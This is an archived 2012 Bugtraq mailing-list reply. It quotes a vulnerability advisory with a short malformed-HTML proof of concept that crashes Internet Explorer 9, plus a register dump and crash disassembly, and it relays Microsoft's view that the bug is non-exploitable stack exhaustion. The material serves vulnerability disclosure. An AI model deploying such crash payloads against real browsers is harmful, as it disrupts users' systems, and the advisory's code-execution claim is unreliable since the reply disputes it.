lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 20 Dec 2012 01:05:07 +0100
From: Fabio Baroni <fabiothebest@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Jonathan Ness from the Microsoft Security Response Center says this
IE9 POC is stack exhaustion, not a stack-based buffer overflow and
Stack exhaustion is typically not exploitable for code execution.

2012/12/19  <pereira@...biz.de>:
> -----------------------------------------------------------------------
> Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability
> -----------------------------------------------------------------------
>
> Author: Jean Pascal Pereira <pereira@...biz.de>
>
> Vendor: Microsoft Internet Explorer 9.x and below
>
> Description:
>
> The application is prone to a remote stack overflow vulnerability.
>
> Successful exploitation may lead to arbitrary code execution.
>
> ----------------------------------------------------------------------
> Proof Of Concept:
> ----------------------------------------------------------------------
>
> <table></for xmlns="1">
> <td><datetime><colgroup>
> <id><dd><col>
> </table><object>
> <hr><base>
>
> ----------------------------------------------------------------------
> Register Dump:
> ----------------------------------------------------------------------
>
> EAX 800706BE
> ECX 763FCDB3 RPCRT4.763FCDB3
> EDX 00000000
> EBX 0604393C
> ESP 003FDDD4
> EBP 003FDDE0
> ESI 003FDE30
> EDI 761AFA10 ole32.761AFA10
> EIP 7629CF51 ole32.7629CF51
>
> ----------------------------------------------------------------------
> Crash Instruction:
> ----------------------------------------------------------------------
>
> 7629CF36   8B4D E4          MOV ECX,DWORD PTR SS:[EBP-1C]
> 7629CF39   24 04            AND AL,4
> 7629CF3B   0FB6C0           MOVZX EAX,AL
> 7629CF3E   F7D8             NEG EAX
> 7629CF40   1BC0             SBB EAX,EAX
> 7629CF42   25 0A010180      AND EAX,8001010A
> 7629CF47   8901             MOV DWORD PTR DS:[ECX],EAX
> 7629CF49   8B45 E8          MOV EAX,DWORD PTR SS:[EBP-18]
> 7629CF4C   50               PUSH EAX
> 7629CF4D   53               PUSH EBX
> 7629CF4E   8975 D8          MOV DWORD PTR SS:[EBP-28],ESI
> 7629CF51   FF70 5C          PUSH DWORD PTR DS:[EAX+5C]
>
> ----------------------------------------------------------------------
> At 0x7629CF51, a read access violation occurs.
> ----------------------------------------------------------------------
>
> Jean Pascal Pereira <pereira@...biz.de> || http://www.0xffe4.org
>
> Copy: http://paste.kde.org/627968/

Powered by blists - more mailing lists